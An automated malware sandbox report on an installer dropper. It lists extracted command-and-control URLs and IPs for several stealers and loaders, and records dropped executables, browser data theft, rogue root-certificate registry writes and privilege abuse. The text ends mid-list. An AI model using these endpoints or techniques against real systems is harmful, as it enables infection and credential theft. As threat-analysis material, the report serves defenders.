Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 22:51
Static task
static1
Behavioral task
behavioral1
Sample
a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
setup_installer.exe
-
Size
4.1MB
-
MD5
285d53fb7033d07f7c78174e16051576
-
SHA1
06f1aeb9d198646a6fa35a40b3eeef8874539073
-
SHA256
ae66596008f62ccf929050a77e28a7c736db63b417d8319e8f6974151c00b4c8
-
SHA512
7b5c37fe655ab9d39b0fe297c217f70bbaa0ca996885266f965b61ea20ea567582f5eb44008464d60edfc7b62462d786674afff99a74c9feb2d4f9a7faa61b75
-
SSDEEP
98304:xOCvLUBsgMDQMoD5NXwSF4b8efwHNWznaRibQOoHInvcLB:xHLUCgMDQMADXwSo8e4tpibQBHIkB
Malware Config
Extracted
nullmixer
http://hsiens.xyz/
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
smokeloader
pub5
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
gcleaner
ggg-cl.biz
45.9.20.13
Extracted
redline
media214
91.121.67.60:2151
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Signatures
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8849FB06\Thu1009c5af81.exe family_fabookie -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral3/memory/2028-333-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2028-336-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2028-338-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2028-332-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2028-340-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SectopRAT payload 5 IoCs
Processes:
resource yara_rule behavioral3/memory/2028-333-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2028-336-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2028-338-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2028-332-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2028-340-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8849FB06\Thu10c488b371805e.exe family_socelars -
OnlyLogger payload 4 IoCs
Processes:
resource yara_rule behavioral3/memory/2676-153-0x00000000003A0000-0x00000000003E8000-memory.dmp family_onlylogger behavioral3/memory/2676-154-0x0000000000400000-0x0000000000883000-memory.dmp family_onlylogger behavioral3/memory/2676-368-0x0000000000400000-0x0000000000883000-memory.dmp family_onlylogger behavioral3/memory/2676-380-0x0000000000400000-0x0000000000883000-memory.dmp family_onlylogger -
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral3/memory/2172-148-0x0000000000400000-0x00000000008D6000-memory.dmp family_vidar behavioral3/memory/2172-144-0x0000000002730000-0x0000000002806000-memory.dmp family_vidar behavioral3/memory/2172-367-0x0000000000400000-0x00000000008D6000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 72 1728 rundll32.exe 75 1728 rundll32.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8849FB06\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8849FB06\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8849FB06\libstdc++-6.dll aspack_v212_v242 -
Executes dropped EXE 14 IoCs
Processes:
setup_install.exeThu1071035b3cb.exeThu108c22e0002.exeThu1009c5af81.exeThu105dc00580c8df.exeThu10e4c72be5623a40.exeThu1059c186da67d4.exeThu10c488b371805e.exeThu10ab306459a77.exeThu10fbc9c6f3.exeThu105ed9e6198dd191.exe09xU.exEThu10ab306459a77.exef77d3f2.exepid process 2688 setup_install.exe 2172 Thu1071035b3cb.exe 1540 Thu108c22e0002.exe 1524 Thu1009c5af81.exe 1924 Thu105dc00580c8df.exe 1904 Thu10e4c72be5623a40.exe 1944 Thu1059c186da67d4.exe 1644 Thu10c488b371805e.exe 1920 Thu10ab306459a77.exe 1928 Thu10fbc9c6f3.exe 2676 Thu105ed9e6198dd191.exe 1244 09xU.exE 2028 Thu10ab306459a77.exe 1224 f77d3f2.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeThu1071035b3cb.execmd.execmd.exeThu105dc00580c8df.exeThu10e4c72be5623a40.exeThu1059c186da67d4.execmd.exeThu10ab306459a77.exeThu10c488b371805e.exeThu10fbc9c6f3.exeThu105ed9e6198dd191.execmd.exe09xU.exErundll32.exeWerFault.exeWerFault.exeThu10ab306459a77.exerundll32.exepid process 1160 setup_installer.exe 1160 setup_installer.exe 1160 setup_installer.exe 2688 setup_install.exe 2688 setup_install.exe 2688 setup_install.exe 2688 setup_install.exe 2688 setup_install.exe 2688 setup_install.exe 2688 setup_install.exe 2688 setup_install.exe 2496 cmd.exe 3064 cmd.exe 2508 cmd.exe 2988 cmd.exe 3064 cmd.exe 2440 cmd.exe 2924 cmd.exe 2924 cmd.exe 2472 cmd.exe 2172 Thu1071035b3cb.exe 2172 Thu1071035b3cb.exe 2564 cmd.exe 2920 cmd.exe 2920 cmd.exe 1924 Thu105dc00580c8df.exe 1924 Thu105dc00580c8df.exe 1904 Thu10e4c72be5623a40.exe 1904 Thu10e4c72be5623a40.exe 1944 Thu1059c186da67d4.exe 1944 Thu1059c186da67d4.exe 2452 cmd.exe 2452 cmd.exe 1920 Thu10ab306459a77.exe 1920 Thu10ab306459a77.exe 1644 Thu10c488b371805e.exe 1644 Thu10c488b371805e.exe 1928 Thu10fbc9c6f3.exe 1928 Thu10fbc9c6f3.exe 2676 Thu105ed9e6198dd191.exe 2676 Thu105ed9e6198dd191.exe 596 cmd.exe 1244 09xU.exE 1244 09xU.exE 2828 rundll32.exe 2828 rundll32.exe 2828 rundll32.exe 1920 Thu10ab306459a77.exe 1536 WerFault.exe 1536 WerFault.exe 1536 WerFault.exe 1536 WerFault.exe 2392 WerFault.exe 2392 WerFault.exe 2392 WerFault.exe 2392 WerFault.exe 2028 Thu10ab306459a77.exe 2028 Thu10ab306459a77.exe 1728 rundll32.exe 1728 rundll32.exe 1728 rundll32.exe 1728 rundll32.exe 1728 rundll32.exe 1728 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 63 pastebin.com 32 iplogger.org 33 iplogger.org 50 iplogger.org 59 iplogger.org 61 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 30 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Thu10ab306459a77.exedescription pid process target process PID 1920 set thread context of 2028 1920 Thu10ab306459a77.exe Thu10ab306459a77.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1536 2688 WerFault.exe setup_install.exe 2392 2172 WerFault.exe Thu1071035b3cb.exe 1620 1224 WerFault.exe f77d3f2.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Thu1059c186da67d4.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu1059c186da67d4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu1059c186da67d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu1059c186da67d4.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1464 taskkill.exe 1692 taskkill.exe -
Processes:
Thu1071035b3cb.exeThu10c488b371805e.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Thu1071035b3cb.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Thu10c488b371805e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Thu10c488b371805e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Thu10c488b371805e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Thu10c488b371805e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Thu10c488b371805e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Thu1071035b3cb.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Thu1071035b3cb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Thu10c488b371805e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Thu10c488b371805e.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Thu1059c186da67d4.exepowershell.exepid process 1944 Thu1059c186da67d4.exe 1944 Thu1059c186da67d4.exe 1640 powershell.exe 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 1368 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Thu105ed9e6198dd191.exepid process 2676 Thu105ed9e6198dd191.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Thu1059c186da67d4.exepid process 1944 Thu1059c186da67d4.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
Thu10c488b371805e.exetaskkill.exepowershell.exeThu108c22e0002.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 1644 Thu10c488b371805e.exe Token: SeAssignPrimaryTokenPrivilege 1644 Thu10c488b371805e.exe Token: SeLockMemoryPrivilege 1644 Thu10c488b371805e.exe Token: SeIncreaseQuotaPrivilege 1644 Thu10c488b371805e.exe Token: SeMachineAccountPrivilege 1644 Thu10c488b371805e.exe Token: SeTcbPrivilege 1644 Thu10c488b371805e.exe Token: SeSecurityPrivilege 1644 Thu10c488b371805e.exe Token: SeTakeOwnershipPrivilege 1644 Thu10c488b371805e.exe Token: SeLoadDriverPrivilege 1644 Thu10c488b371805e.exe Token: SeSystemProfilePrivilege 1644 Thu10c488b371805e.exe Token: SeSystemtimePrivilege 1644 Thu10c488b371805e.exe Token: SeProfSingleProcessPrivilege 1644 Thu10c488b371805e.exe Token: SeIncBasePriorityPrivilege 1644 Thu10c488b371805e.exe Token: SeCreatePagefilePrivilege 1644 Thu10c488b371805e.exe Token: SeCreatePermanentPrivilege 1644 Thu10c488b371805e.exe Token: SeBackupPrivilege 1644 Thu10c488b371805e.exe Token: SeRestorePrivilege 1644 Thu10c488b371805e.exe Token: SeShutdownPrivilege 1644 Thu10c488b371805e.exe Token: SeDebugPrivilege 1644 Thu10c488b371805e.exe Token: SeAuditPrivilege 1644 Thu10c488b371805e.exe Token: SeSystemEnvironmentPrivilege 1644 Thu10c488b371805e.exe Token: SeChangeNotifyPrivilege 1644 Thu10c488b371805e.exe Token: SeRemoteShutdownPrivilege 1644 Thu10c488b371805e.exe Token: SeUndockPrivilege 1644 Thu10c488b371805e.exe Token: SeSyncAgentPrivilege 1644 Thu10c488b371805e.exe Token: SeEnableDelegationPrivilege 1644 Thu10c488b371805e.exe Token: SeManageVolumePrivilege 1644 